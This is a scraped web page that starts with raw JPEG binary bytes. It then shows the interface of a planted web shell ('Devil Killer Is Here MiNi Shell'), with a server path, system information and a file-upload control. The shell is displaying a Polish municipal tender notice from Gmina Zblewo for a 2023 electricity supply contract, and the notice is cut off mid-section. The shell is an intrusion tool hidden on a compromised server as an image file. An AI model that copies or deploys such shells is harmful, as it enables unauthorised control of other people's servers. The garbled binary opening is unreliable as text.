JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220812/0030438101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Kompleksowa dostawa (sprzedaż z usługą dystrybucji) energii elektrycznej dla Gminy Zblewo i jej jednostek organizacyjnych w okresie od 01.01.2023 r. do 31.12.2023 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZBLEWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675729</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Główna 40</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zblewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@zblewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/zblewo</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa dostawa (sprzedaż z usługą dystrybucji) energii elektrycznej dla Gminy Zblewo i jej jednostek organizacyjnych w okresie od 01.01.2023 r. do 31.12.2023 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cb77d47e-1a2a-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00304381</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00040253/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.12 Kompleksowa dostawa (sprzedaż z usługą dystrybucji) energii elektrycznej dla Gminy Zblewo i jej jednostek organizacyjnych w okresie od 01.01.2023 r. do 31.12.2023 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zblewo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między zamawiającym a wykonawcą, odbywać się będzie przy użyciu środków<br/>komunikacji elektronicznej, za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/zblewo. Zamawiający informuje, że instrukcje korzystania<br/>zplatformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści<br/>SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy<br/>użyciuplatformazakupowa.pl znajdują się w zakładce &#34;Instrukcje dla Wykonawców&#34; na stronie<br/>internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Wyłącznie w sytuacjach<br/>awaryjnych z wyjątkiem składania ofert zamawiający dopuszcza komunikację elektroniczną poprzez<br/>email:zamowieniapubliczne@zblewo.pl lub gmina@zblewo.pl. Adres strony internetowej do<br/>komunikacji to:https://platformazakupowa.pl/pn/zblewo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zalecenia: 1. Rozszerzenia plików<br/>wykorzystywanych przez Wykonawców powinny być zgodne z<br/>załącznikiem nr 2 do „Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych&#34;, zwanego dalej Rozporządzeniem KRI.2.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf 3. W celu ewentualnej kompresji danych zamawiający rekomenduje<br/>wykorzystanie jednego z rozszerzeń:3.1. .zip 3.2. .7Z 4. Wśród rozszerzeń powszechnych a<br/>niewystępujących w rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie. 5. Zamawiający zwraca uwagę na<br/>ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi<br/>maksymalnie10MB,orazna ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej<br/>do składania podpisu osobistego, który wynosi maksymalnie 5MB. 6. W przypadku stosowania przez<br/>wykonawcę kwalifikowanego podpisu elektronicznego: 6.1. ze względu na niskie ryzyko naruszenia<br/>integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości przekonwertowanie plików<br/>składających się na ofertę na rozszerzenie .pdf i opatrzenie ich podpisem<br/>kwalifikowanym w formacie PAdES.6.2. pliki w innych formatach niż pdf zaleca się opatrzyć podpisem<br/>w formacie XAdES o typie zewnętrznym. Wykonawca powinien pamiętać, aby plik z podpisem<br/>przekazywać łącznie z dokumentem podpisywanym.6.3. Zamawiający rekomenduje wykorzystanie<br/>podpisu z kwalifikowanym znacznikiem czasu.7. Zamawiający zaleca aby w przypadku podpisywania<br/>pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami<br/>podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>8.Zamawiający zaleca, aby wykonawca z odpowiednim wyprzedzeniem przetestował możliwość<br/>prawidłowego wykorzystania wybranej metody podpisania plików oferty. 9. Osobą składającą ofertę<br/>powinna być osoba kontaktowa podawana w dokumentacji.10. Ofertę należy przygotować z należytą<br/>starannością dla podmiotu ubiegającego się o udzielenie zamówienia publicznego i zachowaniem<br/>odpowiedniego odstępu czasu do zakończenia przyjmowania ofert. Sugerujemy złożenie oferty na 24<br/>godziny przed terminem składania ofert.11. Jeśli wykonawca pakuje dokumenty np. w plik o<br/>rozszerzeniu .zip zaleca się wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>12.Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich<br/>podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne<br/>będzie z koniecznością odrzuceniaoferty.13. Wykonawca, przystępując do niniejszego postępowania o<br/>udzielenie zamówieniapublicznego:13.1. akceptuje warunki korzystania z platformazakupowa.pl<br/>określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34;<br/>oraz uznaje go zawiążący,13.2. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej<br/>podlinkiem:https://drive.google.eom/file/d/1Kd1DttbBeiNWt4q4slS4t76IZVKPbkyD/view<br/>14. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania zplatformazakupowa.pl. 15. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie , w pkt. 7.9 SWZ określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) z dnia 27 kwietnia 2016 r.<br/>(Dz.Urz.UE.L Nr 119/1), dalej „RODO”, informuję, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Gmina Zblewo, w imieniu której działa Wójt<br/>Gminy Zblewo wykonujący prawem określone obowiązki przy pomocy Urzędu Gminy w Zblewie.<br/>Kontakt: ul. Główna 40, 83-210 Zblewo, e-mail: gmina@zblewo.pl, tel. 58 588 43 81.<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie<br/>podstawowym bez negocjacji w związku z Ustawą z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych (Dz.U. 2019.2020 ze zm.), dalej „Ustawą Pzp” oraz art. 5-6 Ustawy z 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach (Dz.U. 2020.164 ze zm.)<br/>3) Odbiorcami Pani/Pana danych osobowych:<br/>a) będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18, art. 74, art.. 253 i art. 260 Ustawy Pzp<br/>- ograniczenie dostępu do Pani/Pana danych osobowych może wystąpić jedynie w szczególnych przypadkach jeśli jest to<br/>uzasadnione ochroną prywatności zgodnie<br/>z art. 18 ust. 5 Ustawy Pzp,<br/>b) będą upoważnieni pracownicy Administratora Danych Osobowych,<br/>c) mogą być podmioty upoważnione na podstawie przepisów prawa (w tym w ramach dostępu do<br/>informacji publicznej) oraz podwykonawcy związani z Administratorem Danych umowami powierzenia<br/>przetwarzania danych osobowych.<br/>4) Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 i 4 Ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a następnie według<br/>kategorii archiwalnej dokumentacji postępowania o udzielenie zamówienia.<br/>5) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach Ustawy Pzp, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania<br/>określonych danych wynikają z Ustawy Pzp.<br/>6) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>7) W związku z jawnością postępowania o udzielenie zamówienia publicznego Pani/Pana dane<br/>osobowe mogą być przekazywane do państw poza EOG z zastrzeżeniem, o którym mowa<br/>w art. 18 ust. 5 Ustawy Pzp.<br/>8) Administrator danych osobowych będzie przetwarzał dane osobowe zebrane w postępowaniu o<br/>udzielenie zamówienia w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.<br/>9) Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO *** - zgłoszenie<br/>żądania ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>10) Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych,<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.<br/>Klauzula informacyjna o przetwarzaniu danych<br/>została zawarta w pkt. 31 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna o przetwarzaniu danych<br/>została zawarta w pkt. 31 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RO.271.29.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiotem niniejszego zamówienia jest kompleksowa dostawa energii elektrycznej<br/>(sprzedaż z usługą dystrybucji) do obiektów wymienionych w Załączniku nr 1 do SWZ – opis<br/>przedmiotu zamówienia. Zapotrzebowanie energii elektrycznej w okresie od 01.01.2023 r. do<br/>31.12.2023 r. wynosi: 1 346 979 kWh (zamówienie planowane).<br/>4.2. Szczegółowy zakres zamówienia został określony w Załączniku nr 1 do SWZ, zgodnie z<br/>przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne. Pozostałe warunki dotyczące<br/>realizacji zamówienia określone zostały w projektowanych postanowieniach umowy sprzedaży<br/>energii elektrycznej – Załącznik nr 2 do SWZ.<br/>4.3. Dostawa energii elektrycznej odbywać się będzie na warunkach określonych przepisami<br/>ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne oraz zgodnie z wydanymi do tej ustawy<br/>przepisami wykonawczymi w szczególności ze standardami jakości obsługi odbiorców<br/>określonymi w Rozporządzeniu Ministra Energii z dnia 6 marca 2019 r. w sprawie<br/>szczegółowych zasad kształtowania i kalkulacji taryf oraz rozliczeń w obrocie energią<br/>elektryczną. Parametry jakościowe energii elektrycznej w części dystrybucyjnej reguluje<br/>Rozporządzenie Ministra Gospodarki z dnia 4 maja 2007 w sprawie szczegółowych warunków<br/>funkcjonowania systemu elektroenergetycznego.<br/>4.4. Usługi dystrybucyjne będą świadczone na podstawie umowy zawartej przez Zamawiającego<br/>z właściwym Operatorem Systemu Dystrybucyjnego (zwany OSD) – dane OSD zawarte są w<br/>Załączniku nr 1 do SWZ. Sprzedawcą rezerwowym jest: Energa – Operator S.A.<br/>4.5. Wymagania (obowiązki) stawiane Wykonawcy, opisane zostały w projektowanych<br/>postanowieniach umowy sprzedaży stanowiący Załącznik nr 2 do SWZ. Wykonanie czynności<br/>wynikających z pełnomocnictwa, stanowiącego Załącznik nr 2 do Umowy sprzedaży energii<br/>elektrycznej, zwanej dalej Umową. Zamawiający udzieli wyłonionemu w postępowaniu<br/>Wykonawcy pełnomocnictwa do:<br/>4.5.1. Powiadomienia właściwego Operatora Systemu Dystrybucyjnego o zawarciu umowy<br/>sprzedaży energii elektrycznej oraz o planowanym terminie rozpoczęcia sprzedaży energii<br/>elektrycznej.<br/>4.5.2. Złożenia oświadczenia o wypowiedzeniu dotychczas obowiązującej umowy kompleksowej<br/>(sprzedaż energii elektrycznej i świadczenie usług dystrybucji), umowy sprzedażowej, umowy<br/>dystrybucyjnej lub złożenia oświadczenia o rozwiązaniu umowy kompleksowej (sprzedaż energii<br/>elektrycznej i świadczenie usług dystrybucji), umowy sprzedażowej, umowy dystrybucyjnej w<br/>trybie zgodnego porozumienia stron dla punktów poboru energii elektrycznej zawartych w<br/>załączniku nr 1 do umowy oraz nowych punktów poboru, zgodnie z harmonogramem<br/>wypowiadania umów zawartym w załączniku nr 1 do umowy (Załącznik nr 1 do SWZ).<br/>4.5.3. Zawarcia Umowy o Świadczenie Usług Dystrybucji, w tym przez złożenie Operatorowi<br/>Systemu Dystrybucyjnego wyłącznie wymaganego oświadczenia według wzoru skutkującego<br/>zawarciem takiej umowy pomiędzy mocodawcą i Operatorem Systemu Dystrybucyjnego.<br/>Powołane oświadczenie złożone przez pełnomocnika w imieniu mocodawcy zawierać będzie<br/>m.in. bezwarunkową zgodę na zawarcie pomiędzy mocodawcą, a Operatorem Systemu Dystrybucyjnego umowy na czas<br/>nieoznaczony na warunkach wynikających ze wzoru umowy<br/>zamieszczonego na stronie internetowej Operatora Systemu Dystrybucyjnego oraz na<br/>warunkach obowiązującej taryfy Operatora Systemu Dystrybucyjnego i Instrukcji Ruchu i<br/>Eksploatacji Sieci Dystrybucyjnej jak również w zakresie warunków technicznych świadczenia<br/>usługi dystrybucji, grupy taryfowej, okresu rozliczeniowego aby były to warunki dotychczasowe.<br/>Powołane oświadczenie zawierać będzie także zobowiązanie o przestrzeganiu przez<br/>mocodawcę warunków korzystania z usług dystrybucji energii elektrycznej oraz zobowiązanie do<br/>terminowej zapłaty należności za usługi dystrybucyjne świadczone przez OSD. Należności za<br/>usługi dystrybucji z zawartej umowy uiszcza sam mocodawca, i mocodawca oraz inne podmioty,<br/>którym pełnomocnictwo zostanie przedłożone, przyjmują do wiadomości że pełnomocnik nie<br/>udziela za nie poręczenia, w tym w zakresie długu przyszłego, i składanego oświadczenia nie<br/>można rozumieć w ten sposób, że pełnomocnik takiego poręczenia udzielił.<br/>4.5.4. Reprezentowania Zamawiającego w kontaktach z dotychczasowym Sprzedawcą energii<br/>elektrycznej lub Operatorem Systemu Dystrybucji w sprawach związanych z procesem zmiany Sprzedawcy dotyczy<br/>punktów poboru zamieszczonych w załączniku nr 1 do umowy (Załącznik<br/>nr 1 do SWZ).<br/>4.5.5. Reprezentowania Zamawiającego w kontaktach z Operatorem Systemu Dystrybucji w sprawach związanych z procesem zgłoszeniem Sprzedawcy dla nowych punktów poboru energii<br/>elektrycznej, na które Zamawiający otrzymał od OSD numer umowy o świadczenie usług<br/>dystrybucji energii elektrycznej.<br/>4.6. Obowiązujące umowy sprzedaży energii elektrycznej z dotychczasowymi sprzedawcami<br/>energii elektrycznej dla punktów poboru energii elektrycznej zawartych w Załączniku nr 1 SWZ<br/>zawarte są na czas określony, a dokładny opis dla każdego z punktów PPE znajduje się w<br/>kolumnie o nazwie „Okres obowiązywania umowy/ okres wypowiedzenia”.<br/>4.7. W Załączniku nr 1 SWZ informacyjnie wskazano aktualne parametry (grupa taryfowa/moce<br/>umowne), które mogą podlegać zmianie w trakcie trwania umowy energii elektrycznej.<br/>4.8. W toku realizacji Umowy Zamawiający zastrzega sobie prawo do zmniejszenia lub<br/>zwiększenia łącznej ilości zakupionej energii w zakresie: zwiększenia do 20%, zmniejszenia do<br/>30%, względem zużycia energii elektrycznej wskazanej w pkt 4.1 SWZ. Zaistnienie okoliczności,<br/>o której mowa powyżej, spowoduje odpowiednio zmniejszenie lub zwiększenie wynagrodzenia<br/>należnego Wykonawcy z tytułu niniejszej Umowy. Zwiększenie lub zmniejszenie ilości energii<br/>elektrycznej nie stanowi podstawy do jakichkolwiek roszczeń ze strony Wykonawcy. Zakres i<br/>zasady dokonania zmian:<br/>4.8.1. zmniejszenie ilości energii elektrycznej wynikające ze zużycia energii wg bieżących<br/>odczytów z licznika, które będzie różne od ilości energii elektrycznej wskazanej w pkt 4.1. SWZ,<br/>odbywa się automatycznie, na podstawie bieżącego zużycia energii elektrycznej na<br/>wystawianych fakturach,<br/>4.8.2. zwiększenie ilości energii elektrycznej wynikające ze zużycia energii wg bieżących<br/>odczytów z licznika, które będzie różne od ilości energii elektrycznej wskazanej w pkt 4.1 SWZ,<br/>odbywa się automatycznie, na podstawie bieżącego zużycia energii elektrycznej na<br/>wystawianych fakturach,<br/>4.8.3. zwiększenie/zmniejszenie (dodanie/odjęcie) ilości PPE–wymaga złożenia przez<br/>Zamawiającego jednostronnego oświadczenia woli. Zmiana ilości PPE wynikać może w<br/>szczególności z likwidacji PPE, powstania/nabycia nowego PPE, zmiany właściwości<br/>technicznych PPE, podwójnego fakturowania w szczególności w przypadku świadczenia usługi<br/>sprzedaży energii elektrycznej na danym PPE przez innego sprzedawcę, zmiany stanu<br/>prawnego lub technicznego PPE, zmiany w zakresie nabywcy, odbiorcy, płatnika w<br/>szczególności przeniesienia praw i obowiązków związanych z obiektem, przy którym znajduje<br/>się dane PPE, zaistnienia przeszkód prawnych i formalnych uniemożliwiających<br/>przeprowadzenie procedury zmiany sprzedawcy lub włączenia punktu poboru przez<br/>Zamawiającego. 4.9. Zamawiający ma prawo, w okresie obowiązywania Umowy do zmiany grup taryfowych,<br/>mocy umownej dla poszczególnych PPE określonych w załączniku nr 1 do Umowy (załącznik nr<br/>1 do SWZ) po uprzednim uzgodnieniu warunków technicznych dokonania tych zmian z<br/>Operatorem Systemu 